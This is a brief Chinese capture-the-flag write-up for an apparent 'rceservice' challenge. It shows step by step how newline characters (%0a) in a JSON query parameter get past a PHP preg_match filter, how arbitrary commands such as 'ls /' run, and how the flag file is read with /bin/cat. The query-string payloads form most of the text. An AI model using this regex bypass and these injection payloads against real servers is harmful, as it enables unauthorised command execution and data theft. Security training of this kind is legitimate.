访问页面,要求以JSON格式输入要执行的命令代码;
尝试一下
?cmd={"echo":"'hello,wolrd'"}
结果被过滤了;
思考了一下,觉得可能是cmd对应执行命令;
试试
?cmd={"cmd":"ls"}
结果成功执行了;
现在来找找flag;
输入
?cmd={"cmd":"ls /"}
很不幸被过滤了;
试了很多种方法,都会被过滤;
思考了一下, 可能使用正则表达式去匹配的关键字;
如果不能正常得绕过关键字,那就把preg_match绕过吧;
preg_match只匹配第一行,如果我们利用换行符%0a来多行绕过,这样正则表达式就没有任何作用了;
?cmd={%0a"cmd":"ls /"%0a}
成功看到了根目录下的文件;
找一找,在home下发现了文件夹
很接近了,打开看看;
jail文件夹里有个ls;
先不管那么多,cat flag;
?cmd={%0A"cmd":"cat /home/rceservice/flag"%0A}
但是并没有返回信息;
cat放在bin文件夹中;
再试试;
?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}
就能拿到flag;
flag{90b3484c-c636-4eac-b5bc-7d2e4b625c18}